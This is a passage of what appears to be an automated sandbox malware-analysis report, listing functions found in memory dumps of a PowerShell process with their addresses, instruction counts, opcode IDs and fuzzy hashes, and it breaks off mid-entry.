                                                                • Instruction Fuzzy Hash: 0E51A734A002059BDF14EF20D854BAFBBB6EF80309F258169DA059B389DB70ED46CBD1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 08416B28, Relevance: .1, Instructions: 136COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.463142967.0000000008410000.00000040.00000001.sdmp, Offset: 08410000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_8410000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 86f9017e7ad70b51e7dbf715f2f9d9a7e7b7324803a6bba74cb3b9ede6fea694
                                                                • Instruction ID: 6f611ecd22ffdb24649451289df348bcb0f3841a66c72a6bb10597c520ef79a8
                                                                • Opcode Fuzzy Hash: 86f9017e7ad70b51e7dbf715f2f9d9a7e7b7324803a6bba74cb3b9ede6fea694
                                                                • Instruction Fuzzy Hash: 4541E935B001589BEF159AA9CC50BAF7AE7DFD8710F25402EE905AB3C0DF758D018BA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 08417BC8, Relevance: .1, Instructions: 135COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.463142967.0000000008410000.00000040.00000001.sdmp, Offset: 08410000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_8410000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 95dae1cc53df23638544dd6ee1a3540a24745aa04894598e6ce27913e44249bf
                                                                • Instruction ID: 7af5b15a131b9141683baeac151d79e8256fad6fdf693a3009f81a80da06cef4
                                                                • Opcode Fuzzy Hash: 95dae1cc53df23638544dd6ee1a3540a24745aa04894598e6ce27913e44249bf
                                                                • Instruction Fuzzy Hash: C9411235B042184FCB15EB788420AAF7BE69FC9214F1404AED445DB385DF349C0287E6
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 053164F5, Relevance: .1, Instructions: 133COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.448403496.0000000005310000.00000040.00000001.sdmp, Offset: 05310000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_5310000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b5233195c4db5718d9e39ba7800a82f676e4f38455bb4604998cddb1a0e40f14
                                                                • Instruction ID: d575b6a5fd60117ed710b9adf0a96ada813fce531daff4b7ff4b6a50376b9b47
                                                                • Opcode Fuzzy Hash: b5233195c4db5718d9e39ba7800a82f676e4f38455bb4604998cddb1a0e40f14
                                                                • Instruction Fuzzy Hash: 8851F375900328DFDB24CF69C854BDEBBB6FB49314F14859AD809A7250CB706A84CFA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0841FA38, Relevance: .1, Instructions: 133COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.463142967.0000000008410000.00000040.00000001.sdmp, Offset: 08410000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_8410000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a955cd030467a0ce7120680747dae5b801f4e74e5295a0746d39a3b521148109
                                                                • Instruction ID: 033d7a21c11950d9fa30b56bdea0bf6c349d480392350204325fd0009948cca5
                                                                • Opcode Fuzzy Hash: a955cd030467a0ce7120680747dae5b801f4e74e5295a0746d39a3b521148109
                                                                • Instruction Fuzzy Hash: FA41F438B00314AFDB249F29982462B7AD7EFCD641F14442EE956C7740EFB9DC068BA4
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 035F3970, Relevance: .1, Instructions: 131COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.441487657.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_35f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: eb57e243572221e51ead79e5d9bcbeebe94fc004cd23847b96b53a4c34609b4d
                                                                • Instruction ID: c1a45a970a81cb1d5ecd1354811054c04e1a689be33c9b59fbb6fec6ee34772f
                                                                • Opcode Fuzzy Hash: eb57e243572221e51ead79e5d9bcbeebe94fc004cd23847b96b53a4c34609b4d
                                                                • Instruction Fuzzy Hash: B941FB74A002058FDB11DF68D850AAEBBF6FF8D314F188269D655EB3A5DB349C01CBA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 08412BE1, Relevance: .1, Instructions: 130COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.463142967.0000000008410000.00000040.00000001.sdmp, Offset: 08410000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_8410000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 364f1073e677a96d92b7d93c39b694fa5236ae816abb3ccc0096390353888f82
                                                                • Instruction ID: 6ae9b883545ce6d6d10421c96d1fe528b720cd1ff3d9e94c4119044990d37dc7
                                                                • Opcode Fuzzy Hash: 364f1073e677a96d92b7d93c39b694fa5236ae816abb3ccc0096390353888f82
                                                                • Instruction Fuzzy Hash: BC41D230B002498BCF15DBB4C8107AF7BBAEF8C204F14842EC606A7381DF759845CBA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 05316500, Relevance: .1, Instructions: 128COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.448403496.0000000005310000.00000040.00000001.sdmp, Offset: 05310000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_5310000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7a532af29f5dda11048bbe77ca5f82952bd3a25f7134595824ce666ded181c5e
                                                                • Instruction ID: 3797384a5098b1ccdfab63d8ba7c875f288a931b9dbd0d8f07b71c58b9474925
                                                                • Opcode Fuzzy Hash: 7a532af29f5dda11048bbe77ca5f82952bd3a25f7134595824ce666ded181c5e
                                                                • Instruction Fuzzy Hash: 3A41F27590032CCFDB24CF65C854B9EBBB6FB49314F1485AAD809A7250CB706E84CFA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0531CB67, Relevance: .1, Instructions: 128COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.448403496.0000000005310000.00000040.00000001.sdmp, Offset: 05310000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_5310000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: dfe108c0cc72606a551d5be34725382597ef6681373d6ce594a101cff1adc953
                                                                • Instruction ID: 176aa50e0a44ad74e8812d80e47470803bde5fdd43bd3bb4062ebb77641452cf
                                                                • Opcode Fuzzy Hash: dfe108c0cc72606a551d5be34725382597ef6681373d6ce594a101cff1adc953
                                                                • Instruction Fuzzy Hash: 91516D78600244CFD719DF34C454BA97BF2BF88304F288569D9569B3A1CB75EC46CB94
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 035F37B9, Relevance: .1, Instructions: 128COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.441487657.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_35f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3b6347f90c4f7d687ef3194ab1f34ff22ef936707ed0cfad3a34c5e6c510e677
                                                                • Instruction ID: d7e440d501f39c7dc0574ee99e6720d5022eead1c75cc5c5531e49b3aef9c05f
                                                                • Opcode Fuzzy Hash: 3b6347f90c4f7d687ef3194ab1f34ff22ef936707ed0cfad3a34c5e6c510e677
                                                                • Instruction Fuzzy Hash: 5E41DD34B002059FDB15DF74D8549AEBBF6FF89204B18847AD506EB365DB319D068B90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0841692D, Relevance: .1, Instructions: 125COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.463142967.0000000008410000.00000040.00000001.sdmp, Offset: 08410000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_8410000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 64ac60aa3c337166d9b434c728341b9e39213387c01a1ca98104363864eada5b
                                                                • Instruction ID: 1a4ea06b47dac3bc474b1c366d83f871f8727388ffba0b861ee2e25d25228226
                                                                • Opcode Fuzzy Hash: 64ac60aa3c337166d9b434c728341b9e39213387c01a1ca98104363864eada5b
                                                                • Instruction Fuzzy Hash: 25419A30A002458FCB15DF74D854AAF7BB6EF81309F25856EC9058B39ADB34DD46CB91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 05317938, Relevance: .1, Instructions: 121COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.448403496.0000000005310000.00000040.00000001.sdmp, Offset: 05310000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_5310000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 298ebde05dab8939bc83a23755ca188b9bcd0e479255d6c90a6af467a9ba4821
                                                                • Instruction ID: 61566a32b29743678cc8df30db1b38a45c910d7eebf231945590d1dfdbd0d556
                                                                • Opcode Fuzzy Hash: 298ebde05dab8939bc83a23755ca188b9bcd0e479255d6c90a6af467a9ba4821
                                                                • Instruction Fuzzy Hash: F4418A383006008FC759EF38E458959BBE2FF89315B248569D50ACB7A1CF75EC56CB90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 08418460, Relevance: .1, Instructions: 121COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.463142967.0000000008410000.00000040.00000001.sdmp, Offset: 08410000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_8410000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 03615f5c11d9cfd95820e3d1935844506a919db89519c48f0a303b8bd1dd9c0d
                                                                • Instruction ID: 443a5307fe9a71bb672345e4aee73318403d9287223f824605dbc0bad0ce468b
                                                                • Opcode Fuzzy Hash: 03615f5c11d9cfd95820e3d1935844506a919db89519c48f0a303b8bd1dd9c0d
                                                                • Instruction Fuzzy Hash: 0B412975E00214CBDF14CFA999403EEBBF5EF88256F14847AD505EB350EB359942CBA4
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 035F6994, Relevance: .1, Instructions: 121COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.441487657.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_35f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 288a7d50376afb2ed431d707d892291214443d2540e9203f172216ddca3ea668
                                                                • Instruction ID: 1553da7a02eeee90e8802967f2be6b1d002833775b45ad48f4e5f8483b3103fa
                                                                • Opcode Fuzzy Hash: 288a7d50376afb2ed431d707d892291214443d2540e9203f172216ddca3ea668
                                                                • Instruction Fuzzy Hash: 97510A34901219CFDB24DF24D854BA9B7B2FF88305F008AD9D94A5B3A1DB35AD85CF81
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 035F37D0, Relevance: .1, Instructions: 118COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.441487657.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_35f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7d9c6f375269e95c238f19030ff6429d10b99615c8996611c1091760b8b23f44
                                                                • Instruction ID: c1f3830603f8775231538af9d68b2a83014236f3ab53f826c9270da7f22978e8
                                                                • Opcode Fuzzy Hash: 7d9c6f375269e95c238f19030ff6429d10b99615c8996611c1091760b8b23f44
                                                                • Instruction Fuzzy Hash: FB418B34B002059FDB14EF75D8549AEBBF6EF88204F188839E516EB354EF719D068B90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 035F94B8, Relevance: .1, Instructions: 116COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.441487657.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_35f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c25f8059ce587a8a57f664d82343bb40a83c56f9a2b05b358f28588b9f94f870
                                                                • Instruction ID: c51d6e9bed9c7fa2962c69cfd7974957784fd529b0c151f73e52c2a7cc4be534
                                                                • Opcode Fuzzy Hash: c25f8059ce587a8a57f664d82343bb40a83c56f9a2b05b358f28588b9f94f870
                                                                • Instruction Fuzzy Hash: EE41AD34305B018FC328DF39E484A37B7A6BFC5211718886ED54A8B765DB31E80ACB40
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0531E4D0, Relevance: .1, Instructions: 113COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.448403496.0000000005310000.00000040.00000001.sdmp, Offset: 05310000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_5310000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: df134e2f9f09675b85d2ba350878b4798d24cfa9a87adc0943a112b06030dfdc
                                                                • Instruction ID: 111c8c0782d41463b560d5afc158c90eb2636ade5243cc5591158126caf9730c
                                                                • Opcode Fuzzy Hash: df134e2f9f09675b85d2ba350878b4798d24cfa9a87adc0943a112b06030dfdc
                                                                • Instruction Fuzzy Hash: 4B318075B001058BD718EBB8886477F7AEB9FC8348F64443C990ADB385EF25DC0287A5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0531E4C8, Relevance: .1, Instructions: 107COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.448403496.0000000005310000.00000040.00000001.sdmp, Offset: 05310000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_5310000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 74ce635838ad869494dc1769e841662ed50bb17cb45fd0567d7515570a0409d0
                                                                • Instruction ID: 19a47e1f0df8e551f57e04ed7fc3f7bd8fd3ffa191b7adaae93a2f47fd669d5e
                                                                • Opcode Fuzzy Hash: 74ce635838ad869494dc1769e841662ed50bb17cb45fd0567d7515570a0409d0
                                                                • Instruction Fuzzy Hash: 13319C75B002159BD718EAB8886477F7AEA9FC8304F24443C9A0ADB395EF259D0287A1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0531E328, Relevance: .1, Instructions: 106COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.448403496.0000000005310000.00000040.00000001.sdmp, Offset: 05310000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_5310000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d0af2175e4742b96318f596296dad7ac15eba92ef77136215238e89bb3f1a1ba
                                                                • Instruction ID: e18c935a8e7d5cf257de117a3c495897cb866d90c6b728c8c1fc5ef7afd31bb7
                                                                • Opcode Fuzzy Hash: d0af2175e4742b96318f596296dad7ac15eba92ef77136215238e89bb3f1a1ba
                                                                • Instruction Fuzzy Hash: AC315A75B002058FDB19DFA9D8446BE7BBAFBC8354F140129EA06DB344DB72AD42CB91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 08415858, Relevance: .1, Instructions: 105COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.463142967.0000000008410000.00000040.00000001.sdmp, Offset: 08410000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_8410000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9f4ac9660c4ca5ede3e476da11b04981c8275550cf1ec8110980099f202428fa
                                                                • Instruction ID: 25088c9b7f09b1b1b11e0b1bbb0ff3c3a7ddcf2a180c66807d499416d5179fc5
                                                                • Opcode Fuzzy Hash: 9f4ac9660c4ca5ede3e476da11b04981c8275550cf1ec8110980099f202428fa
                                                                • Instruction Fuzzy Hash: 5F31E4387043406BF725A7749C10B6E3A8B9F86B04F74857CD1459F3C2CE66AC1587BA
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 035FB380, Relevance: .1, Instructions: 103COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.441487657.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_35f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2d7addc61053e88409731be4e887d0fb79bc1a73726d1533a6dedcd64dc4b8e5
                                                                • Instruction ID: 7a06c11d4374be5ec61424d2a68fd07551e87e46c86fd56cc326de9f00627e1b
                                                                • Opcode Fuzzy Hash: 2d7addc61053e88409731be4e887d0fb79bc1a73726d1533a6dedcd64dc4b8e5
                                                                • Instruction Fuzzy Hash: EA310634B046048FC715EBB9E95063EBBF7EF8565476944ADD109CB3A6DB30EC0187A2
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 08410968, Relevance: .1, Instructions: 102COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.463142967.0000000008410000.00000040.00000001.sdmp, Offset: 08410000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_8410000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 205afedba8a3a658442fa19d25b623bbc728962a5dc1ca9e3067f3430da53995
                                                                • Instruction ID: e047e51c0763f24906f7fd4a6ec862ed384fdcdade97596cd4c3bc4c10e6454c
                                                                • Opcode Fuzzy Hash: 205afedba8a3a658442fa19d25b623bbc728962a5dc1ca9e3067f3430da53995
                                                                • Instruction Fuzzy Hash: 5331AC72A00715CFCB209FB4C44466E7BB5EF98392F15852AE902DB302DB719985CB91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 035FA440, Relevance: .1, Instructions: 101COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.441487657.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_35f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: cbb4171f8a0e1120405f90a8dae57ffba7bbfa0705ad2f0fdc9d1c89de8f487f
                                                                • Instruction ID: 560754bcba9d67ed4bf2262d75e82c5b59524c6d7e65accc0fbf25a28e454734
                                                                • Opcode Fuzzy Hash: cbb4171f8a0e1120405f90a8dae57ffba7bbfa0705ad2f0fdc9d1c89de8f487f
                                                                • Instruction Fuzzy Hash: DE3181357005118FCB14DB35D854A3EB7FAAF88604B28446DDA06DB3A4EF34DD01CB92
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0841BA29, Relevance: .1, Instructions: 100COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.463142967.0000000008410000.00000040.00000001.sdmp, Offset: 08410000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_8410000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 88eb9f8578e938f7712deeaa11c5c74622bc08e1867ff72e182f5afd6fdd65e8
                                                                • Instruction ID: 266ce6bbc8bbb52f706ba3dd257c3e20f162d333a8887f6f0c243bc7ae232ca8
                                                                • Opcode Fuzzy Hash: 88eb9f8578e938f7712deeaa11c5c74622bc08e1867ff72e182f5afd6fdd65e8
                                                                • Instruction Fuzzy Hash: 75316379B002458FCB55DF68C890AAEBBB6FF89315F25806DD509DB351DB319C02CBA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 035FC250, Relevance: .1, Instructions: 99COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.441487657.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_35f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ba504800426b64d8e10354d3fd1083ed30f773d4a17dd2628d4b61e4b8f4cb9b
                                                                • Instruction ID: 6a86b66c4a6935910a269e31ad44eb1208c5f81d5aa84ee150c83eff99c5adaa
                                                                • Opcode Fuzzy Hash: ba504800426b64d8e10354d3fd1083ed30f773d4a17dd2628d4b61e4b8f4cb9b
                                                                • Instruction Fuzzy Hash: 7141F575E00319DFDB14CF65D884B9DFBB1BF89300F1582AAD548AB250DB70A985CF91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 08415868, Relevance: .1, Instructions: 96COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.463142967.0000000008410000.00000040.00000001.sdmp, Offset: 08410000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_8410000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 14e8421fbc0f78a8024ba0e61499b95c21c3d3e5fa270d04c36edd97d7bcfe29
                                                                • Instruction ID: 900df314fd32c1211a98f721283a98144ea30136c2ef33a5151271c5ea008d98
                                                                • Opcode Fuzzy Hash: 14e8421fbc0f78a8024ba0e61499b95c21c3d3e5fa270d04c36edd97d7bcfe29
                                                                • Instruction Fuzzy Hash: 1F318F387403146BE718A7759C10B6E3A8B9B86B08F64853CD145AF3C5CE66AC1547AA
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 035FBEF0, Relevance: .1, Instructions: 94COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.441487657.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_35f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d088ef5114d8796412ca69ed02bf6e082850828ec5465cdafbda4c13124b507c
                                                                • Instruction ID: 477d1f536b27a8449aef37c7048f2dec167f94976ba4c6a9937b8b30a9d5ec81
                                                                • Opcode Fuzzy Hash: d088ef5114d8796412ca69ed02bf6e082850828ec5465cdafbda4c13124b507c
                                                                • Instruction Fuzzy Hash: 7A312932B04214DFC710DBA9E40076EB7E6FFC6720F1984BAD24AC7260D731E8468B51
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0841BA38, Relevance: .1, Instructions: 93COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.463142967.0000000008410000.00000040.00000001.sdmp, Offset: 08410000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_8410000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: fc65c6f8d5a626fe2fae9bd11ec9d2fd6ffe4aa608538224f2283d07b536ca0e
                                                                • Instruction ID: c8a668710bf75515bf7ed1fba89dd4510f9cd517b44b3fe9796d086bc678a9e6
                                                                • Opcode Fuzzy Hash: fc65c6f8d5a626fe2fae9bd11ec9d2fd6ffe4aa608538224f2283d07b536ca0e
                                                                • Instruction Fuzzy Hash: 05315C79B002098FCB54DF68C890AAEB7B6FF88315F25802DE509DB350DB319C028BA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 035F4AF5, Relevance: .1, Instructions: 89COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.441487657.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_35f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 36373efee7b3426c9f3ea25cf6191ae5cf384453517272f6d024a6d3760dbb3c
                                                                • Instruction ID: b89f903e124e02a909a52a6eee5985a827c196775fbb1137ecaf03746daf3612
                                                                • Opcode Fuzzy Hash: 36373efee7b3426c9f3ea25cf6191ae5cf384453517272f6d024a6d3760dbb3c
                                                                • Instruction Fuzzy Hash: 473127353083449FC706DB64DC90AAB7BAAFF8A214F18419AE9408F3A2DB35EC05C791
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 035F6EF0, Relevance: .1, Instructions: 88COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.441487657.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_35f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a7567e4bec0bd2a45cde5fbca6da261cdcdc57a3a84bea1cd12641923ee37a33
                                                                • Instruction ID: 501dc34c57beef2b93c47d731146d972719c8c4ce26ba13c284e54ad859f66fd
                                                                • Opcode Fuzzy Hash: a7567e4bec0bd2a45cde5fbca6da261cdcdc57a3a84bea1cd12641923ee37a33
                                                                • Instruction Fuzzy Hash: 2A311E38304612CFC754EA2AE1C0829B7E5FF452207454899FA97CBB79DB30EC42CB41
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 08418680, Relevance: .1, Instructions: 84COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.463142967.0000000008410000.00000040.00000001.sdmp, Offset: 08410000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_8410000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: dc15b7398cc5f6d58686ed574c79dc61541f4ce700a689f59b8aeec0af187b8f
                                                                • Instruction ID: 237b9f71df8f42472d6dc532300b743982058da02d49ddcfdcef12cab382d0a6
                                                                • Opcode Fuzzy Hash: dc15b7398cc5f6d58686ed574c79dc61541f4ce700a689f59b8aeec0af187b8f
                                                                • Instruction Fuzzy Hash: DF2184363002205FD700DB79EC84D5ABBAAFFC9665324817AE605CB361CB32EC24C790
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 035F57B7, Relevance: .1, Instructions: 83COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.441487657.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_35f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2e63250821bb1c8b12a265cd61cce414e19f60f609843debe86d55c0589fa281
                                                                • Instruction ID: bedd7cac1645d58f0bf39d887f175c9e662a72295144c9f4399054f24df40175
                                                                • Opcode Fuzzy Hash: 2e63250821bb1c8b12a265cd61cce414e19f60f609843debe86d55c0589fa281
